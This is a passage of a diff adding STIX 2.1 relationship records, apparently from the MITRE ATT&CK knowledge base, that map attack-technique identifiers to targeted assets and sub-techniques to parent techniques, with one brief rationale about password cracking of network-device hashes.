"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cef47b20-c518-4aad-9e54-58fff3e7a3aa", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf02fc81-7725-46e9-bb1f-37758d95ac7d", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf052b89-0400-46ab-a160-012cc7b2e5aa", + "created": "2024-06-26T11:55:34.528Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T11:55:34.528Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf056465-79f6-45be-8563-66a919981452", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf07fdf9-9737-4fd9-876c-da96d5b8d1a1", + "created": "2020-12-28T21:51:00.016Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", + "target_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf1c2a1e-90f7-40b1-93a1-7acdffc9e183", + "created": "2022-08-09T13:01:43.404Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-08-09T13:01:43.404Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--70910fbd-58dc-4c1c-8c48-814d11fcd022", + "target_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf36992b-49c7-4a4c-8fd0-30e23cd8d7b8", + "created": "2020-01-14T01:29:43.874Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf53ff89-3c31-4f8d-83a1-b74dce4c558d", + "created": "2023-09-29T16:29:16.222Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:29:16.222Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf5ddeaf-b023-4241-85d8-fc99062e2970", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf7d8d14-debb-46fc-a9a5-5c2284adaea7", + "created": "2024-06-26T13:52:56.459Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:52:56.459Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf832fb0-e09a-4192-a6e6-2a53e8943881", + "created": "2024-05-22T17:22:01.144Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:20:34.186Z", + "description": "Asset Mapping Rationale: Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. Further, adversaries may leverage Data from Configuration Repository in order to obtain hashed credentials for network devices.", + "relationship_type": "targets", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cf8a816c-30ee-4147-a48f-d797fb145a04", + "created": "2023-09-29T17:43:10.828Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:43:10.829Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cfa91796-af1b-462e-a4d6-41d7c08b8c19", + "created": "2024-06-27T09:37:13.807Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:37:13.807Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cfaead3c-3db5-400f-bd15-dfbc57cf0185", + "created": "2023-09-28T21:15:44.547Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:15:44.547Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cfc69d1d-aa20-4037-8d43-413c08343b46", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cfc70477-4a23-4c75-ac58-573b51b5fe9c", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cfdabe14-b8e7-4079-83dc-c36699f58030", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--cfec6ea3-c808-46eb-b80b-30d9828c7577", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d00f5a3a-622b-4ca4-b91c-b5975c8d8611", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d022b112-215c-4b02-a794-6a431991270f", + "created": "2024-06-26T14:39:01.993Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:39:01.993Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b0e54bf7-835e-4f44-bd8e-62f431b9b76a", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d02812b2-23c3-4dce-bf94-c6e464e86fab", + "created": "2023-10-02T20:22:25.770Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:22:25.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d02c5439-72f2-475f-8d2e-bc97f46a642e", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d030cda4-8cc9-4df8-9bfb-bea709706a75", + "created": "2024-06-26T19:22:25.596Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:22:25.596Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d032a43c-8e49-4252-bdd0-a517a915188f", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d03de729-9235-4ceb-a1c0-935e2088020b", + "created": "2023-09-28T21:29:12.533Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:29:12.533Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d04d426f-fd43-444c-8391-75ac3117d72a", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d061e030-6ad7-457d-a909-5ca6f7282762", + "created": "2020-10-01T00:51:28.557Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d06246a1-ddd5-40cb-9d76-19d71ee4b1e8", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d06e0607-88d9-4a25-93b4-9b97a72c19d6", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d0741465-c94e-4213-b830-2c4f09052334", + "created": "2021-03-17T20:31:07.895Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--506f6f49-7045-4156-9007-7474cb44ad6d", + "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d074d6f2-8932-4bc2-85b9-ef1ee943be82", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d0934ba2-a4dc-4e1a-8065-84b142ecb01c", + "created": "2020-02-11T18:39:25.202Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d0954e1d-3e2b-413f-af4c-88a47df59a63", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d0d0c359-b21c-4b13-9652-3b4b19c4fecf", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d0d60b49-0db3-418e-b25a-4009831816dd", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d0df5cac-d6ee-41a0-a500-deccc34bf9f8", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d0e5d834-338b-4c5f-968a-f9f477bc7b9f", + "created": "2020-03-13T17:48:59.225Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--d117879c-1e2e-4ff3-a66c-764552ee54a4", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": 